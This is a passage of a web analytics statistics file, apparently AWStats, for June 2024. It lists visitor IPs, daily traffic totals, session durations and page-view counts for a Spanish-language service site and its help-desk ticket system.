172.81.59.45 4 4 10996 20240624031647
185.255.130.106 1 1 4264 20240624114833
143.198.33.146 1 1 4264 20240601061009
194.61.40.140 1 1 2749 20240625230232
216.238.69.122 1 1 809 20240611102941
35.232.161.196 3 17 2290448 20240603153426
31.217.248.15 1 1 2749 20240604163352
72.49.49.11 1 1 11874 20240613022710
199.244.88.231 1 1 4264 20240625165758
64.23.244.131 1 1 4264 20240630070932
46.101.76.88 1 1 4264 20240601232341
205.210.31.174 1 1 17038 20240627194559
138.197.67.170 1 1 809 20240618181435
152.32.198.168 1 1 17038 20240612193526
113.141.91.58 1 1 4264 20240627064016
191.156.177.246 2 14 4687693 20240617142549
45.156.128.96 1 1 4264 20240623223152
49.47.154.26 1 15 2281920 20240628005121
198.98.62.110 2 2 23748 20240625040223
67.201.33.10 2 2 23748 20240628105559
200.110.170.115 2 17 6852709 20240612142939
66.135.10.3 1 1 0 20240611125743
120.71.59.24 1 1 4264 20240613000128
51.159.103.12 1 1 809 20240615032529
154.37.65.5 1 1 2749 20240606184450
34.41.41.244 1 1 4264 20240617032551
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20240601 49 97 9320588 16
20240602 23 51 4682434 17
20240603 50 95 12424473 35
20240604 30 74 8066116 26
20240605 35 92 9232376 29
20240606 48 93 7067400 37
20240607 63 147 21162884 36
20240608 26 40 2406110 21
20240609 17 17 57148 16
20240610 44 51 305864 32
20240611 117 160 4839942 32
20240612 52 119 35173325 39
20240613 80 137 7226592 31
20240614 36 67 8976251 27
20240615 46 87 11894462 35
20240616 31 32 94096 25
20240617 58 127 24239240 39
20240618 64 181 16999338 31
20240619 59 76 2703777 32
20240620 60 90 4778079 30
20240621 31 82 9329251 23
20240622 36 50 2400532 20
20240623 38 38 126931 30
20240624 76 268 57290990 49
20240625 66 134 11678730 40
20240626 50 107 9523788 38
20240627 84 100 10637678 27
20240628 43 114 11506144 37
20240629 86 100 2395337 31
20240630 96 138 7070943 31
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
30s-2mn 17
30mn-1h 3
0s-30s 846
2mn-5mn 8
5mn-15mn 11
15mn-30mn 27
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 39
/suspencion.php 613 546029 308 308
/ 367 2387416 314 281
/contactenos.php 326 1824259 214 237
/pqr/upload/scp/tickets.php 50 281777 2 1
/index.php 41 350876 23 27
/pqr/upload/scp/logo.php 40 0 30 24
/pqr/upload/scp/autocron.php 35 1470 0 4
/residenciales.php 12 49633 5 4
/pqr/upload/ 10 18737 2 5
/pqr/upload/scp/ajax.php/users/lookup/form 10 19505 0 2
/pqr/upload/scp/index.php 8 30034 2 0
/pqr/upload/scp/ajax.php/content/signature/none 7 0 0 0
/pqr/upload/scp/ajax.php/form/help-topic/12 7 40516 0 0
/corporativo.php 7 30805 1 3
/medidor.php 6 24173 1 3
/pqr/upload/scp/ajax.php/list/3/items/33/preview 5 675 0 0
/pqr/upload/ajax.php/i18n/es_MX/js 5 13995 1 0
/pqr/upload/scp/ajax.php/users/local 5 198 0 0
/pqr/upload/logo.php 5 96145 1 1
/caracteristicas.php 5 51847 0 1
/pqr/upload/scp/ajax.php/tickets/1096/preview 4 3052 0 0
/informacion_crc.php 3 6648 1 2
/pqr/upload/scp/ajax.php/draft/ticket.staff 3 108 0 0
/control.php 3 12729 0 0
/pqr/upload/open.php 2 5180 2 2
/factores.php 1 12421 0 0
/pqr/upload/scp/ajax.php/help/tips/tickets.queue 1 1465 0 0
/pqr/upload/view.php 1 1509 1 1
/pqr/upload/scp/ajax.php/tickets/1097/status/close/3 1 807 0 0
/pqr/upload/scp/users.php 1 5446 0 0
/pqr/upload/scp/dashboard.php 1 3324 0 0
/pqr/upload/scp/ajax.php/list/3/items/43/preview 1 132 0 0
/pqr/upload/account.php 1 6809 1 1
/pqr/upload/scp/ajax.php/tickets/1091/user 1 2499 0 1
/procedimientos.php 1 4876 1 1
/pqr/upload/scp/ajax.php/tickets/1093/preview 1 732 0 1
/pqr/upload/scp/ajax.php/lock/ticket/1097 1 40 0 0
/pqr/upload/scp/ajax.php/users/select/644 1 2386 0 0
/pqr/upload/index.php 2 2694 2 2
END_SIDER
